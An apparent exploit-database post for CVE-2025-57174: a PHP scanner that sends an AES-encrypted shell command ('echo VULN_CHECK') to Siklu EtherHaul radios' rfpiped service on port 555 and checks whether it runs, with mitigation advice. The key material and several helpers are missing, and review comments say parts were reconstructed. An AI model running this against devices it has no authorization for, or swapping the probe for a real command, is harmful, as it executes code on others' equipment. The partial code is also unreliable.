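=============================================================================================================================================
| # Title : Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner                                                                          |
| # Author : indoushka                                                                                                                        |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                              |
| # Vendor : https://www.ceragon.com/products/siklu-by-ceragon                                                                                |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214068/ & CVE-2025-57174

[+] Summary : This PHP-based scanner detects an unauthenticated remote command execution vulnerability in Siklu
    EtherHaul devices by sending an encrypted probe command over the rfpiped channel and validating the response.
    The probe is the harmless command `echo VULN_CHECK`; it does not change device configuration, but note that a
    positive result means a command WAS executed on the target, so only run it against systems you are authorized
    to test. Each blocking network call is bounded by a timeout, which makes the scanner suitable for large-scale
    assessments.

[+] Impact: Successful detection confirms full unauthenticated RCE exposure.

[+] Mitigation:
    - Restrict access to TCP port 555 (the rfpiped service) to trusted management hosts
    - Disable the rfpiped service if it is not required
    - Update to vendor firmware that addresses CVE-2025-57174

[+] Exit codes: 0 = a verdict was printed (vulnerable / not vulnerable / no response), 2 = usage or connection error.

[+] POC:

php poc.php 192.168.1.10

<?php
// NOTE(review): this copy of the script was mangled by HTML-tag stripping -- everything
// between the original "<?php" tag and the constructor's first "$this->" is missing.
// The definitions the code below still relies on (PORT, HDR_LEN, the static $KEY / $IV0
// key material, recv_exact(), build_header(), pad16_zero()) are therefore NOT present
// here and must be restored from the referenced Packet Storm post before running.
// The class header and constructor below were reconstructed from the surviving
// fragment ("key = $key; $this->send_iv = $iv; $this->recv_iv = $iv; }") and from the
// "new RFPipeSession($KEY, $IV0)" call site; verify them against the original.

/**
 * One encrypted rfpiped session.
 *
 * Framing is AES-256-CBC with OPENSSL_ZERO_PADDING (i.e. no padding: every plaintext
 * must already be a multiple of 16 bytes) and manual IV chaining -- the last ciphertext
 * block of each message becomes the IV of the next one, separately for each direction.
 */
class RFPipeSession
{
    /**
     * Largest response body the scanner will read back, in bytes. The length field comes
     * from the remote device (unsigned 32-bit), so without a cap a hostile or confused
     * peer could make recv_exact() wait for up to 4 GiB.
     */
    const MAX_BODY = 65536;

    private $key;
    private $send_iv;
    private $recv_iv;

    /**
     * @param string $key  32-byte AES-256 key.
     * @param string $iv   16-byte initial IV, used for both directions.
     */
    function __construct($key, $iv)
    {
        $this->key     = $key;
        $this->send_iv = $iv;
        $this->recv_iv = $iv;
    }

    /**
     * Encrypt $data and write all of it to $sock.
     *
     * @param resource $sock  connected socket
     * @param string   $data  plaintext; must be a multiple of 16 bytes (zero padding is
     *                        the caller's job, see pad16_zero())
     * @return bool true when every byte was written, false on a padding, cipher or
     *              socket error
     */
    function enc_send($sock, $data)
    {
        // OPENSSL_ZERO_PADDING disables padding, so an unaligned buffer would make
        // openssl_encrypt() fail; reject it up front instead of chaining a bogus IV.
        if (strlen($data) % 16 !== 0) {
            return false;
        }
        $ct = openssl_encrypt(
            $data,
            'AES-256-CBC',
            $this->key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->send_iv
        );
        if ($ct === false) {
            return false;
        }
        // Chain: the last ciphertext block is the IV for the next outbound message.
        $this->send_iv = substr($ct, -16);
        return self::write_all($sock, $ct);
    }

    /**
     * Read and decrypt one HDR_LEN-byte header.
     *
     * @return string|false decrypted header, or false if the read or decrypt failed
     */
    function recv_header($sock)
    {
        $ct = recv_exact($sock, HDR_LEN);
        if ($ct === false) {
            return false;
        }
        return $this->decrypt_chunk($ct);
    }

    /**
     * Read and decrypt a body of $len plaintext bytes (ciphertext is rounded up to the
     * next 16-byte boundary on the wire).
     *
     * @param int $len  plaintext length announced by the peer
     * @return string|false exactly $len bytes of plaintext, or false if $len is 0 /
     *                      exceeds MAX_BODY or the read or decrypt failed
     */
    function dec_recv($sock, $len)
    {
        if ($len <= 0 || $len > self::MAX_BODY) {
            return false;
        }
        $padded = ($len + 15) & ~15;
        $ct = recv_exact($sock, $padded);
        if ($ct === false) {
            return false;
        }
        $pt = $this->decrypt_chunk($ct);
        if ($pt === false) {
            return false;
        }
        return substr($pt, 0, $len);
    }

    /**
     * Decrypt one inbound ciphertext chunk and advance the receive IV.
     * The IV is advanced even if decryption fails, matching the original chaining.
     *
     * @return string|false
     */
    private function decrypt_chunk($ct)
    {
        $pt = openssl_decrypt(
            $ct,
            'AES-256-CBC',
            $this->key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->recv_iv
        );
        $this->recv_iv = substr($ct, -16);
        return $pt;
    }

    /**
     * Write the whole buffer, retrying on short writes.
     * socket_write() may send fewer bytes than asked for; a partial frame would
     * desynchronise the CBC chain on the device side.
     *
     * @return bool
     */
    private static function write_all($sock, $buf)
    {
        $total = strlen($buf);
        $sent  = 0;
        while ($sent < $total) {
            $n = @socket_write($sock, substr($buf, $sent));
            if ($n === false || $n === 0) {
                return false;
            }
            $sent += $n;
        }
        return true;
    }
}

// ---------------------------------------------------------------------------
// Entry point: php siklu_eh_scanner.php <target> [timeout_seconds]
// ---------------------------------------------------------------------------
if ($argc < 2) {
    echo "Usage: php siklu_eh_scanner.php <target> [timeout_seconds]\n";
    exit(2);
}

$target  = trim($argv[1]);
$timeout = isset($argv[2]) ? max(1, (int) $argv[2]) : 5;   // seconds per blocking call
$probe   = "echo VULN_CHECK\x00";                             // NUL-terminated shell command

$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false) {
    echo "[!] socket_create failed: " . socket_strerror(socket_last_error()) . "\n";
    exit(2);
}

// Bound every blocking read/write so a host that accepts the connection but never
// answers cannot stall a sweep. (The connect() itself is not covered by these options.)
$tv = ['sec' => $timeout, 'usec' => 0];
@socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, $tv);
@socket_set_option($sock, SOL_SOCKET, SO_SNDTIMEO, $tv);

if (!@socket_connect($sock, $target, PORT)) {
    echo "[!] Connection failed\n";
    socket_close($sock);
    exit(2);
}

$sess = new RFPipeSession($KEY, $IV0);
$hdr  = build_header(0x00, 0x01, strlen($probe));

if (!$sess->enc_send($sock, $hdr) || !$sess->enc_send($sock, pad16_zero($probe))) {
    echo "[!] Send failed\n";
    socket_close($sock);
    exit(2);
}

$resp_hdr = $sess->recv_header($sock);
// The length field is read at offset 0x08, so anything shorter than 12 bytes
// cannot carry it; treat that like no answer at all.
if ($resp_hdr === false || strlen($resp_hdr) < 0x0c) {
    echo "[?] No response (filtered or patched)\n";
    socket_close($sock);
    exit(0);
}

// 'V' is an unsigned little-endian 32-bit value, so it can never be negative;
// an implausibly large value is treated as a non-answer rather than read back.
$len = unpack('V', substr($resp_hdr, 0x08, 4))[1];
if ($len === 0) {
    echo "[-] Not Vulnerable\n";
    socket_close($sock);
    exit(0);
}
if ($len > RFPipeSession::MAX_BODY) {
    echo "[?] Unexpected response length ($len bytes), not reading it back\n";
    socket_close($sock);
    exit(0);
}

$data = $sess->dec_recv($sock, $len);
// The verdict keys on the probe's own argument being echoed back. NOTE(review): a
// device that reflects the unknown command inside an error message would also match;
// confirm against a known-patched unit if false positives are suspected.
if ($data !== false && strpos($data, 'VULN_CHECK') !== false) {
    echo "[+] VULNERABLE: Unauthenticated RCE detected\n";
} else {
    echo "[-] Not Vulnerable\n";
}
socket_close($sock);
exit(0);
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================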